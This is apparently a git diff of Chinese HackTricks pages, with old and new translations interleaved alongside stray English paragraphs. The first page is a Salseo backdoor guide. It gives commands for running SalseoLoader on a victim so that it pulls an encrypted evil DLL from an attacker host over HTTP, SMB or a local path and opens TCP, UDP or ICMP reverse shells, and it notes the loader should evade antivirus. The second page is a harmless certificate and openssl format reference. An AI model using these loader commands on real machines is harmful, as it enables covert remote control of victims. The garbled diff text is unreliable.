1. **Antivirus Software**: Regularly update and use reputable antivirus software to detect and remove known malware signatures associated with the Salseo backdoor.
2. **Patch Management**: Keep software and operating systems up to date with the latest security patches to mitigate vulnerabilities that could be exploited by the backdoor.
3. **Email Security**: Implement email security measures, such as spam filters and email scanning, to prevent malicious attachments from reaching users' inboxes.
4. **User Education**: Train users to recognize and avoid suspicious emails, websites, and downloads that could potentially deliver the Salseo backdoor.
5. **Network Monitoring**: Implement network monitoring tools to detect unusual network traffic patterns that may indicate the presence of the backdoor.
By implementing these measures, organizations can enhance their security posture and reduce the risk of falling victim to the Salseo backdoor.
通过了解这些技术,安全专家可以更好地保护系统不受未经授权的访问和操控。
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
好的现在你已经拥有执行所有Salseo操作所需的一切**编码的EvilDalsa.dll**和**SalseoLoader的二进制文件**。
**将SalseoLoader.exe二进制文件上传到目标机器。它们不应该被任何杀毒软件检测到...**
## **执行后门**
### **获取TCP反向Shell通过HTTP下载编码的dll**
记得启动一个nc作为反向Shell监听器并启动一个HTTP服务器来提供编码的evilsalsa。
记得启动nc作为反向Shell监听器和一个HTTP服务器来提供编码的evilsalsa。
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **获取UDP反向shell通过SMB下载编码的dll**
### **获取UDP反向Shell通过SMB下载编码的dll**
记得启动一个nc作为反向shell监听器并启动一个SMB服务器来提供编码的evilsalsaimpacket-smbserver
记得启动nc作为反向Shell监听器以及一个SMB服务器来提供编码的evilsalsaimpacket-smbserver
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
### **获取ICMP反向shell已在受害者内部编码的dll**
### **获取 ICMP 反向 shell编码后的 dll 已在受害者内部)**
**这次你需要在客户端上使用一个特殊工具来接收反向shell。下载** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
**这次你需要在客户端下载一个特殊工具来接收反向 shell。下载** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
#### **禁用ICMP回复**
#### **禁用 ICMP 回复:**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
@ -118,90 +96,76 @@ sysctl -w net.ipv4.icmp_echo_ignore_all=1
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### 执行客户端:
To execute the client, you need to follow these steps:
1. Make sure you have the client file downloaded and saved on your local machine.
2. Open a terminal or command prompt.
3. Navigate to the directory where the client file is located using the `cd` command.
4. Once you are in the correct directory, run the client file by typing its name followed by the appropriate command. For example, if the client file is named `client.exe`, you would type `client.exe` and press Enter.
5. The client will then execute and start running on your machine.
Remember to exercise caution when executing any files, especially those obtained from untrusted sources. Always scan files for malware before running them.
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### 在受害者内部,让我们执行salseo操作
#### 在受害者内部执行salseo操作
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## 将SalseoLoader编译为导出主函数的DLL
## 将 SalseoLoader 编译为导出 main 函数的 DLL
使用Visual Studio打开SalseoLoader项目。
使用 Visual Studio 打开 SalseoLoader 项目。
### 在函数之前添加:\[DllExport]
### 在 main 函数之前添加:\[DllExport]
![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
### 为该项目安装DllExport
### 为此项目安装 DllExport
#### **工具** --> **NuGet程序包管理器** --> **管理解决方案的NuGet程序包...**
#### **工具** --> **NuGet 包管理器** --> **为解决方案管理 NuGet 包...**
![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
#### **搜索DllExport包使用浏览选项卡然后点击安装(并接受弹出窗口)**
#### **搜索 DllExport 包(使用浏览标签),然后按安装(并接受弹出窗口)**
![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1).png>)
![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1).png>)
项目文件夹中会出现以下文件:**DllExport.bat**和**DllExport\_Configure.bat**
您的项目文件夹中出现了文件:**DllExport.bat** 和 **DllExport\_Configure.bat**
### **卸载DllExport**
### **卸载** DllExport
点击**卸载**(是的,很奇怪,但相信我,这是必要的)
**卸载**(是的,这很奇怪,但相信我,这是必要的)
![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
### **退出Visual Studio并执行DllExport\_configure**
### **退出 Visual Studio 并执行 DllExport\_configure**
只需**退出**Visual Studio
只需**退出** Visual Studio
然后,转到**SalseoLoader文件夹**并**执行DllExport\_Configure.bat**
然后,转到您的 **SalseoLoader 文件夹** 并**执行 DllExport\_Configure.bat**
选择**x64**如果您将在x64系统中使用它这是我的情况选择**System.Runtime.InteropServices**(在**DllExport的命名空间**中)并点击**应用**
选择 **x64**(如果您要在 x64 系统中使用,那是我的情况),选择 **System.Runtime.InteropServices**(在 **Namespace for DllExport** 中)并按 **应用**
![](<../.gitbook/assets/image (7) (1) (1) (1).png>)
![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>)
### **再次使用Visual Studio打开项目**
### **再次使用 Visual Studio 打开项目**
**\[DllExport]**不再标记为错误
**\[DllExport]** 应该不再标记为错误
![](<../.gitbook/assets/image (8) (1).png>)
### 构建解决方案
选择**输出类型=类库**(项目 --> SalseoLoader属性 --> 应用程序 --> 输出类型=类库)
选择 **输出类型 = 类库**(项目 --> SalseoLoader 属性 --> 应用程序 --> 输出类型 = 类库)
![](<../.gitbook/assets/image (10) (1).png>)
选择**x64平台**(项目 --> SalseoLoader属性 --> 构建 --> 平台目标=x64
选择 **x64 平台**(项目 --> SalseoLoader 属性 --> 构建 --> 平台目标 = x64
![](<../.gitbook/assets/image (9) (1) (1).png>)
要**构建**解决方案:构建 --> 构建解决方案在输出控制台中将显示新DLL的路径
要**构建**解决方案:构建 --> 构建解决方案(在输出控制台中将显示新 DLL 的路径)
### 测试生成的DLL
### 测试生成的 Dll
将DLL复制并粘贴到要进行测试的位置
复制并粘贴 Dll 到您想要测试的地方
执行:
```
rundll32.exe SalseoLoader.dll,main
```
如果没有出现错误,那么你可能有一个功能正常的DLL
如果没有出现错误,那么你可能已经有了一个功能性的DLL
## 使用DLL获取shell
@ -216,23 +180,7 @@ $env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
CMD (Command Prompt) is a command-line interpreter in Windows operating systems. It provides a text-based interface for executing commands and managing the system. CMD can be used to perform various tasks, such as navigating through directories, running programs, and managing files and processes.
CMD is a powerful tool for hackers as it allows them to execute commands and scripts on a target system. By gaining access to CMD, hackers can perform a wide range of activities, including reconnaissance, privilege escalation, and data exfiltration.
To exploit CMD, hackers often use backdoors to gain persistent access to a compromised system. A backdoor is a hidden entry point that allows unauthorized access to a system. By installing a backdoor on a target system, hackers can maintain access even if the system is patched or the user's password is changed.
There are several ways to create a backdoor in CMD. One common method is to use the "netsh" command to create a persistent backdoor. The "netsh" command is a powerful utility that allows users to configure network settings. By using the "netsh" command, hackers can create a backdoor that listens for incoming connections and provides them with remote access to the compromised system.
Another method is to use the "reg" command to create a backdoor in the Windows Registry. The Windows Registry is a hierarchical database that stores configuration settings and options for the operating system. By modifying the Registry, hackers can create a backdoor that is executed every time the system starts up, providing them with persistent access to the compromised system.
In addition to creating backdoors, hackers can also use CMD to execute various commands and scripts on a target system. For example, they can use CMD to run password-cracking tools, launch denial-of-service attacks, or download and execute malicious payloads.
To protect against CMD-based attacks, it is important to implement strong security measures, such as regularly updating the operating system and using strong passwords. Additionally, monitoring network traffic and using intrusion detection systems can help detect and prevent unauthorized access to CMD.
By understanding how CMD works and the various techniques used by hackers, you can better protect your systems and networks from potential attacks.
### 命令提示符(CMD)
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
@ -243,12 +191,14 @@ rundll32.exe SalseoLoader.dll,main
```
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>零基础学习AWS黑客攻击成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗想要在HackTricks中**宣传你的公司**吗?或者你想要**获取PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>

259
cryptography/certificates.md
View file

@ -2,96 +2,98 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
<summary><strong>从零到英雄学习AWS黑客攻击通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
* 你在一家**网络安全公司**工作吗?想要在 HackTricks 中**宣传你的公司**吗?或者想要**获取最新版本的 PEASS 或下载 HackTricks 的 PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者**关注**我在**推特**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
支持HackTricks的其他方式
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter**上**关注**我 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。\
使用 [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) 轻松构建并**自动化工作流程**,由世界上**最先进的**社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## 什么是证书
在密码学中,**公钥证书**,也称为**数字证书**或**身份证书**,是用于证明公钥所有权的电子文档。证书包括有关密钥的信息,其所有者的身份信息(称为主体),以及验证证书内容的实体的数字签名(称为颁发者)。如果签名有效,并且检查证书的软件信任颁发者,则可以使用该密钥与证书的主体进行安全通信。
在密码学中,**公钥证书**,也称为**数字证书**或**身份证书**,是用来证明公钥所有权的电子文件。证书包含关于密钥的信息、其所有者(称为主题)的身份信息,以及已验证证书内容的实体(称为发行者)的数字签名。如果签名有效,并且检查证书的软件信任发行者,那么它可以使用该密钥与证书的主题安全通信。
在典型的[公钥基础设施](https://en.wikipedia.org/wiki/Public-key\_infrastructure)PKI方案中证书颁发者是一个[证书颁发机构](https://en.wikipedia.org/wiki/Certificate\_authority)CA通常是一家向客户收费为其颁发证书的公司。相比之下,在[信任网络](https://en.wikipedia.org/wiki/Web\_of\_trust)方案中,个人直接签署彼此的密钥,以一种类似于公钥证书的格式执行相似功能
在典型的[公钥基础设施](https://en.wikipedia.org/wiki/Public-key_infrastructure)PKI方案中证书发行者是[证书机构](https://en.wikipedia.org/wiki/Certificate_authority)CA通常是向客户收费以为他们发行证书的公司。相比之下,在[信任网络](https://en.wikipedia.org/wiki/Web_of_trust)方案中,个人直接签署彼此的密钥,以一种执行与公钥证书类似功能的格式
公钥证书最常见格式由[X.509](https://en.wikipedia.org/wiki/X.509)定义。由于X.509非常通用,该格式受到为某些用例定义的配置文件的进一步限制,例如[RFC 5280](https://en.wikipedia.org/wiki/PKIX)中定义的[公钥基础设施X.509](https://en.wikipedia.org/wiki/PKIX)
公钥证书最常见格式由[X.509](https://en.wikipedia.org/wiki/X.509)定义。因为X.509非常通用,所以格式进一步受到某些用例定义的配置文件的限制,例如[RFC 5280](https://en.wikipedia.org/wiki/PKIX)中定义的[公钥基础设施X.509]。
## x509 常见字段
## x509常见字段
* **版本号**x509 格式的版本。
* **序列号**:用于在 CA 的系统中唯一标识证书。特别是用于跟踪吊销信息。
* **主**:证书所属的实体:机器、个人或组织。
* **通用名称**:受证书影响的域。可以是一个或多个,并且可以包含通配符。
* **版本号**x509格式的版本。
* **序列号**:用于在CA系统内唯一识别证书。特别是用于跟踪撤销信息。
* **主**:证书所属的实体:机器、个人或组织。
* **通用名称**:受证书影响的域。可以是1个或多个可以包含通配符。
* **国家C**:国家
* **可分辨名称DN**:完整的主`C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net`
* **地L**:地区
* **可分辨名称DN**:完整的主`C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net`
* **地L**:本地地点
* **组织O**:组织名称
* **组织单位OU**:组织的部门(如“人力资源”)。
* **州或省ST、S 或 P**:州或省名称列表
* **发者**:验证信息并签署证书的实体。
* **通用名称CN**:证书颁发机构的名称
* **国家C**:证书颁发机构的国家
* **可分辨名称DN**:证书颁发机构的可分辨名称
* **地L**:组织所在的地方
* **州或省ST, S或P**:州或省名称列表
* **者**:验证信息并签署证书的实体。
* **通用名称CN**:证书机构的名称
* **国家C**:证书机构的国家
* **可分辨名称DN**:证书机构的可分辨名称
* **地L**:可以找到组织的本地地点
* **组织O**:组织名称
* **组织单位OU**:组织的部门(如“人力资源”)。
* **起始日期**:证书有效的最早时间和日期。通常设置为证书签发前几小时或几天,以避免[时钟偏差](https://en.wikipedia.org/wiki/Clock\_skew#On\_a\_network)问题。
* **截止日期**:证书不再有效的时间和日期。
* **公钥**:属于证书主的公钥。(这是主要部分之一,因为这是由 CA 签名的内容
* **公钥算法**:用于生成公钥的算法。 RSA。
* **公钥曲线**:椭圆曲线公钥算法使用的曲线(如果适用)。 nistp521。
* **公钥指数**:用于推导公钥的指数(如果适用)。 65537。
* **公钥大小**:公钥空间的位大小。 2048。
* **生效前**:证书有效的最早时间和日期。通常设置在证书发行时刻的几小时或几天前,以避免[时钟偏差](https://en.wikipedia.org/wiki/Clock_skew#On_a_network)问题。
* **生效后**:证书不再有效的时间和日期。
* **公钥**:属于证书主的公钥。这是主要部分之一因为这是由CA签名的
* **公钥算法**用于生成公钥的算法。如RSA。
* **公钥曲线**椭圆曲线公钥算法使用的曲线如果适用。如nistp521。
* **公钥指数**用于推导公钥的指数如果适用。如65537。
* **公钥大小**公钥空间的位大小。如2048。
* **签名算法**:用于签署公钥证书的算法。
* **签名**颁发者的私钥对证书主体进行的签名。
* **x509v3 扩展**
* **签名**由发行者的私钥对证书正文的签名。
* **x509v3扩展**
* **密钥用途**:证书公钥的有效加密用途。常见值包括数字签名验证、密钥加密和证书签名。
* 在 Web 证书中,它将显示为 _X509v3 扩展_,并具有值 `Digital Signature`
* **扩展密钥用途**:证书可用于的应用程序。常见值包括 TLS 服务器身份验证、电子邮件保护和代码签名。
* 在 Web 证书中,它将显示为 _X509v3 扩展_,并具有值 `TLS Web Server Authentication`
* **主体备用名称**:允许用户为单个 SSL 证书指定其他主机**名称**。使用 SAN 扩展是 SSL 证书的标准做法,正在逐步取代常用**名称**的使用。
* **基本约束**:此扩展描述证书是 CA 证书还是终端实体证书。CA 证书是签署其他证书的证书,终端实体证书是例如网页中使用的证书(链的最后部分)。
* **主题密钥标识符**SKI此扩展声明证书中公钥的唯一标识符。所有CA证书都需要此扩展。CA将自己的SKI传播到已签发证书的发行者密钥标识符AKI扩展中。它是主题公钥的哈希值
* **颁发机构密钥标识符**:它包含从发行者证书中的公钥派生的密钥标识符。它是发行者公钥的哈希
* **颁发机构信息访问**AIA此扩展包含最多两种类型的信息:
* 关**如何获取此证书的发者**的信息CA发者访问方法)
* 可以检查此证书吊销的**OCSP响应者的地址**OCSP访问方法
* **CRL分发点**:此扩展标识可以检查此证书吊销的CRL的位置。处理证书的应用程序可以从此扩展获取CRL的位置下载CRL然后检查此证书的吊销
* **CT预证书SCT**:关于证书透明性的日志
* 在Web证书中这将显示为_X509v3扩展_值为`数字签名`
* **扩展密钥用途**:证书可能使用的应用程序。常见值包括TLS服务器认证、电子邮件保护和代码签名。
* 在Web证书中这将显示为_X509v3扩展_值为`TLS Web服务器认证`
* **主题备用名称**允许用户为单个SSL**证书**指定额外的主机**名称**。使用SAN扩展是SSL证书的标准做法它正在取代通用**名称**的使用。
* **基本约束**此扩展描述证书是CA证书还是终端实体证书。CA证书是签署其他证书的证书终端实体证书是例如网页中使用的证书(链的最后部分)。
* **主题密钥标识符**SKI此扩展声明证书中公钥的唯一**标识符**。所有CA证书都需要此扩展。CA将自己的SKI传播到所发行证书的发行者**密钥标识符**AKI扩展上。它是主题公钥的哈希
* **权威密钥标识符**:它包含从发行者证书中的公钥派生的密钥标识符。它是发行者公钥的哈希。
* **权威信息访问**AIA此扩展最多包含两种类型的信息:
* 关**如何获取此证书的发者**CA发者访问方法)的信息
* 可以检查此证书撤销情况的**OCSP响应者的地址**OCSP访问方法
* **CRL分发点**:此扩展标识了可以检查此证书撤销情况的CRL的位置。处理证书的应用程序可以从此扩展获取CRL的位置下载CRL然后检查此证书的撤销情况
* **CT预证书SCTs**:关于证书的证书透明度日志
### OCSP和CRL分发点的区别
### OCSP与CRL分发点之间的区别
**OCSP**RFC 2560是一个标准协议由**OCSP客户端和OCSP响应者**组成。该协议**确定给定数字公钥证书的吊销状态**,而无需**下载**整个CRL。\
**CRL**是检查证书有效性的**传统方法**。**CRL提供了已吊销或不再有效的证书序列号列表**。CRL允许验证者在验证证书时检查所呈现证书的吊销状态。CRL的条目数限制为512个。\
源:[这里](https://www.arubanetworks.com/techdocs/ArubaOS%206\_3\_1\_Web\_Help/Content/ArubaFrameStyles/CertRevocation/About\_OCSP\_and\_CRL.htm)。
**OCSP**RFC 2560是一个标准协议由**OCSP客户端和OCSP响应者**组成。该协议**确定给定数字公钥证书的撤销状态****无需**下载**整个CRL**。\
**CRL**是检查证书有效性的**传统方法**。**CRL提供了已被撤销或不再有效的证书序列号的列表**。CRL允许验证者在验证证书时检查所呈现证书的撤销状态。CRL的条目限制为512个。\
[这里](https://www.arubanetworks.com/techdocs/ArubaOS%206_3_1_Web_Help/Content/ArubaFrameStyles/CertRevocation/About_OCSP_and_CRL.htm)。
### 什么是证书透明
### 什么是证书透明
证书透明性旨在通过使SSL证书的颁发和存在对域所有者、CA和域用户开放审查来解决基于证书的威胁。具体而言证书透明性有三个主要目标:
证书透明度旨在通过**使SSL证书的发行和存在对域名所有者、CA和域名用户开放审查**来解决基于证书的威胁。具体来说,证书透明度有三个主要目标:
* 使CA**无法在未被该域的所有者**看到的情况下**为该域颁发SSL证书**,或者至少非常困难
* 提供一个**开放的审计和监控系统**让任何域所有者或CA确定证书是否被错误或恶意颁发
* **尽可能地保护用户**免受错误或恶意颁发的证书的欺骗。
* 使CA**发行域名的SSL证书而不被该域名的所有者看到变得不可能或至少非常困难**
* 提供一个**开放的审计和监控系统任何域名所有者或CA都可以确定是否有证书被错误地或恶意地**发行
* **尽可能保护用户**不受错误或恶意发行的证书的欺骗。
#### **证书日志**
证书日志是简单的网络服务,用于维护**具有密码学保证、公开可审计、仅追加记录的证书**。**任何人都可以向日志提交证书**,尽管证书颁发机构可能是最主要的提交者。同样,任何人都可以查询日志以获取密码学证明,用于验证日志是否正常运行或验证特定证书是否已被记录。日志服务器的数量不必很大(比如全球少于一千个每个服务器可以由CA、ISP或任何其他感兴趣的方运营。
证书日志是简单的网络服务,维护**加密保证的、公开可审计的、仅附加记录的证书**。**任何人都可以向日志提交证书**,尽管证书机构可能是最主要的提交者。同样,任何人都可以查询日志以获取密证明,该证明可用于验证日志是否正常运行或验证特定证书是否已记录。日志服务器的数量不必很多(比如,全球不到一千个每个服务器可以由CA、ISP或任何其他感兴趣的方独立运营。
#### 查询
您可以查询[https://crt.sh/](https://crt.sh)上任何域的证书透明性日志。
您可以在[https://crt.sh/](https://crt.sh)查询任何域名的证书透明度日志。
## 格式
@ -99,29 +101,29 @@
#### **PEM格式**
* 是用于证书的最常见格式
* 大多数服务器(例如Apache期望证书和私钥分别存储在不同的文件中\
* 是用于证书的最常见格式
* 大多数服务器(例如Apache期望证书和私钥在单独的文件中\
\- 通常它们是Base64编码的ASCII文件\
\- 用于PEM证书的扩展名为.cer、.crt、.pem、.key文件\
\- Apache和类似服务器使用PEM格式证书
\- PEM证书使用的扩展名有.cer、.crt、.pem、.key文件\
\- Apache和类似服务器使用PEM格式证书
#### **DER格式**
* DER格式是证书的二进制形式
* 所有类型的证书和私钥都可以编码为DER格式
* DER格式的证书不包含“BEGIN CERTIFICATE/END CERTIFICATE”语句
* DER格式的证书通常使用“.cer”和“.der”扩展名
* DER格式的证书最常使用‘.cer和'.der'扩展名
* DER通常用于Java平台
#### **P7B/PKCS#7格式**
* PKCS#7或P7B格式以Base64 ASCII格式存储并具有.p7b或.p7c文件扩展名
* P7B文件包含证书和链证书中间CA不包含私钥
* PKCS#7或P7B格式存储在Base64 ASCII格式中文件扩展名为.p7b或.p7c
* P7B文件包含证书和链证书中间CA不包含私钥
* 支持P7B文件的最常见平台是Microsoft Windows和Java Tomcat
#### **PFX/P12/PKCS#12格式**
* PKCS#12或PFX/P12格式是一种二进制格式用于将服务器证书、中间证书和私钥存储在一个可加密文件中
* PKCS#12或PFX/P12格式是一种二进制格式用于在一个可加密文件中存储服务器证书、中间证书和私钥
* 这些文件通常具有.pfx和.p12等扩展名
* 它们通常用于Windows机器上导入和导出证书和私钥
@ -131,151 +133,70 @@
```
openssl x509 -in certificatename.cer -outform PEM -out certificatename.pem
```
To convert a PEM (Privacy Enhanced Mail) certificate file to DER (Distinguished Encoding Rules) format, you can use the OpenSSL command-line tool. The following command can be used for the conversion:
```bash
openssl x509 -in certificate.pem -outform der -out certificate.der
```
Replace `certificate.pem` with the path to your PEM certificate file, and `certificate.der` with the desired output file name for the DER format.
This command will read the PEM certificate file and convert it to DER format, saving the result in the specified output file.
It's important to note that PEM and DER are two different formats for representing certificates. PEM is a base64-encoded format that includes header and footer lines, while DER is a binary format. Converting between these formats can be useful in different scenarios, such as when working with different systems or applications that require a specific certificate format.
#### **将 PEM 转换为 DER**
```
openssl x509 -outform der -in certificatename.pem -out certificatename.der
```
**将DER转换为PEM**
DERDistinguished Encoding Rules和PEMPrivacy-Enhanced Mail是两种常见的证书编码格式。DER是一种二进制格式而PEM是一种基于文本的格式。在某些情况下您可能需要将DER格式的证书转换为PEM格式以便更方便地使用和阅读。
要将DER格式的证书转换为PEM格式可以按照以下步骤操作
1. 打开终端或命令提示符窗口并导航到包含DER证书的目录。
2. 运行以下命令将DER证书转换为PEM格式
```plaintext
openssl x509 -inform der -in certificate.der -out certificate.pem
```
在此命令中,`certificate.der`是您要转换的DER证书的文件名`certificate.pem`是转换后的PEM证书的文件名。
3. 执行命令后您将在当前目录中找到转换后的PEM证书文件。
通过执行上述步骤您可以将DER格式的证书转换为PEM格式以便更方便地使用和阅读。
```
openssl x509 -inform der -in certificatename.der -out certificatename.pem
```
**将PEM转换为P7B**
**将 PEM 转换为 P7B**
**注意:** PKCS#7或P7B格式以Base64 ASCII格式存储并具有.p7b或.p7c的文件扩展名。P7B文件仅包含证书和链证书中间CA而不包含私钥。支持P7B文件的最常见平台是Microsoft Windows和Java Tomcat。
**注意:** PKCS#7 或 P7B 格式以 Base64 ASCII 格式存储,文件扩展名为 .p7b 或 .p7c。P7B 文件仅包含证书和链证书(中间 CA不包含私钥。最常支持 P7B 文件的平台是 Microsoft Windows 和 Java Tomcat。
```
openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
```
**将PKCS7转换为PEM格式**
To convert a PKCS7 file to PEM format, you can use the OpenSSL command-line tool. The PKCS7 file contains certificates and/or CRLs (Certificate Revocation Lists) in binary format, while the PEM format is a base64-encoded ASCII representation.
Here's the command to convert a PKCS7 file to PEM:
```plaintext
openssl pkcs7 -inform der -in input.p7b -out output.pem -print_certs
```
Replace `input.p7b` with the path to your PKCS7 file, and `output.pem` with the desired name for the PEM file.
This command reads the PKCS7 file in DER format (`-inform der`), converts it to PEM format, and saves the output to the specified file (`-out output.pem`). The `-print_certs` option is used to print the certificates contained in the PKCS7 file.
After running the command, you will have a PEM file containing the certificates from the original PKCS7 file.
**将PKCS7转换为PEM**
```
openssl pkcs7 -print_certs -in certificatename.p7b -out certificatename.pem
```
**将pfx转换为PEM**
**将 pfx 转换为 PEM**
**注意:** PKCS#12或PFX格式是一种二进制格式用于将服务器证书、中间证书和私钥存储在一个可加密的文件中。PFX文件通常具有.pfx和.p12等扩展名。PFX文件通常用于Windows机器上导入和导出证书和私钥。
**注意:** PKCS#12 或 PFX 格式是一种二进制格式用于在一个可加密文件中存储服务器证书、中间证书和私钥。PFX 文件通常具有 .pfx 和 .p12 等扩展名。PFX 文件通常用于 Windows 机器上导入和导出证书和私钥。
```
openssl pkcs12 -in certificatename.pfx -out certificatename.pem
```
**将PFX转换为PKCS#8**\
**注意:**这需要2个命令
**转换 PFX 至 PKCS#8**\
**注意:** 这需要2条命令
**1- 将PFX转换为PEM**
**1- 将 PFX 转换为 PEM**
```
openssl pkcs12 -in certificatename.pfx -nocerts -nodes -out certificatename.pem
```
**2- 将PEM转换为PKCS8**
PEM格式是一种常见的证书格式而PKCS8是一种用于存储私钥的标准格式。在某些情况下我们可能需要将PEM格式的证书转换为PKCS8格式。下面是一种将PEM格式转换为PKCS8格式的方法
1. 首先确保您已经安装了OpenSSL工具。
2. 打开终端或命令提示符并导航到包含PEM格式证书的目录。
3. 运行以下命令将PEM格式证书转换为PKCS8格式
```bash
openssl pkcs8 -topk8 -inform PEM -outform PEM -in private.pem -out private_pkcs8.pem
```
在上述命令中,`private.pem`是您要转换的PEM格式证书的文件名`private_pkcs8.pem`是转换后的PKCS8格式证书的文件名。
4. 输入命令后系统将提示您输入PEM格式证书的密码。输入密码后转换过程将开始。
5. 转换完成后,您将在当前目录下找到一个名为`private_pkcs8.pem`的文件这就是转换后的PKCS8格式证书。
